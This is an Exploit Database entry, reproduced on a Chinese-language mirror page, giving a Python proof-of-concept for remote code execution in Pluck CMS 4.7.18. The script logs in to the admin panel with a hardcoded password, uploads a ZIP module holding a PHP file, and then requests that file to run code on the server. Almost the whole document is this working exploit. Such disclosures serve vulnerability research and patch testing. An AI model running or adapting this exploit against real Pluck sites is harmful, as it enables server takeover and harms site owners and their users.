Pluck v4.7.18 – Remote Code Execution (RCE)

• Exploit Database
• 21 阅读

• 作者： Mirabbas Ağalarov
  日期： 2023-07-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51592/

• #Exploit Title: Pluck v4.7.18 - Remote Code Execution (RCE)
  #Application: pluck
  #Version: 4.7.18
  #Bugs:RCE
  #Technology: PHP
  #Vendor URL: https://github.com/pluck-cms/pluck
  #Software Link: https://github.com/pluck-cms/pluck
  #Date of found: 10-07-2023
  #Author: Mirabbas Ağalarov
  #Tested on: Linux 
  
  
  import requests
  from requests_toolbelt.multipart.encoder import MultipartEncoder
  
  login_url = "http://localhost/pluck/login.php"
  upload_url = "http://localhost/pluck/admin.php?action=installmodule"
  headers = {"Referer": login_url,}
  login_payload = {"cont1": "admin","bogus": "","submit": "Log in"}
  
  file_path = input("ZIP file path: ")
  
  multipart_data = MultipartEncoder(
  fields={
  "sendfile": ("mirabbas.zip", open(file_path, "rb"), "application/zip"),
  "submit": "Upload"
  }
  )
  
  session = requests.Session()
  login_response = session.post(login_url, headers=headers, data=login_payload)
  
  
  if login_response.status_code == 200:
  print("Login account")
  
   
  upload_headers = {
  "Referer": upload_url,
  "Content-Type": multipart_data.content_type
  }
  upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)
  
  
  if upload_response.status_code == 200:
  print("ZIP file download.")
  else:
  print("ZIP file download error. Response code:", upload_response.status_code)
  else:
  print("Login problem. response code:", login_response.status_code)
  
  
  rce_url="http://localhost/pluck/data/modules/mirabbas/miri.php"
  
  rce=requests.get(rce_url)
  
  print(rce.text)